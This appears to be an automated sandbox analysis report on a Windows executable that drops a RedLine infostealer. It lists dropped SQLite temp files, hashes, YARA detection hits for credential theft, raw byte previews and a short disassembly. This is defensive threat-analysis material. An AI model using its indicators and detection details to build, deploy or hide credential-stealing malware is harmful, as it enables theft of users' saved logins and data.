                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC582.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC593.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC594.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC5A4.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC5A5.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpC5B6.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD440.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD461.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD471.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD482.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD493.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpD4A3.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFC77.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFC87.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFC98.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFCA9.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFCAA.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFCCA.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\tmpFCDA.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):97792
                                                                                Entropy (8bit):5.960605794636107
                                                                                Encrypted:false
                                                                                SSDEEP:1536:Nqs4iqeHlbG6jejoigIH43Ywzi0Zb78ivombfexv0ujXyyed2vteulgS6pIl:7/pVYH+zi0ZbYe1g0ujyzdbI
                                                                                MD5:EAB323FA6C66098BE1068FEF0A03BFF2
                                                                                SHA1:AE2A4B7D9FE9DB57AFCDA3F7AA599D13EEEA4551
                                                                                SHA-256:B978A85D1EF238362AFAFC770A8DA33C6149F54F8767B0F5753F069EB4E0DFFF
                                                                                SHA-512:97BB7D82FAC8D1885806323BB113EBC41EDF90110D5D447BDAD6FE3EF89CBD6226ECEE8BF3419BF00FA2748008F887C17C783FAF1785FBE3C817D32F7D502AAF
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: unknown
                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@....................................K.................................................................................... ............... ..H............text...Ds... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................ .......H...........<.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.075902702239035
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:Ekpb7jn7mf.exe
                                                                                File size:289'471 bytes
                                                                                MD5:4ce2c0836c46c61b588972b56a23d5e2
                                                                                SHA1:939a9f983870df1913acce63ca408bba9789588f
                                                                                SHA256:05df07e5e365386ae0917e177328bc12a2405a1c4317266127abb6903aac59b3
                                                                                SHA512:7b32f30b61ca8dcd9ae897d4d9e0480d8e0e2e5ae43f5f56f393d6a0dce7fa79e501c3d3609fcd288624c817401aa7f53c5f2fcdd7dda78d32c5034519d7256e
                                                                                SSDEEP:6144:+sxanyfX5k7JlJDlABKUtfU/WQcb5sDqaxw3fWHdJytaaDlNiJ:f0nyfXuIBDtfu3qaxzHdJytlM
                                                                                TLSH:FB54D06236D1C031F4B36530D9F89671AE79BC316A35A94EBBC00F6D2FB1A91C225B53
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.HG%.HG%.HG%.A?..SG%.A?...G%.A?..]G%.HG$..G%.A?../G%.A?..IG%.A?..IG%.A?..IG%.RichHG%.................PE..L....R.T...........

                                                                                File Icon

                                                                                Icon Hash:d4a684988ca4a0d5

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x41d7cb
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x54E0521F [Sun Feb 15 08:00:31 2015 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:4cfda23baf1e2e983ddfeca47a5c755a

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                call 00007FAD787E2C8Ah
                                                                                jmp 00007FAD787DC77Dh
                                                                                mov edi, edi
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push esi
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                push eax
                                                                                mov esi, ecx
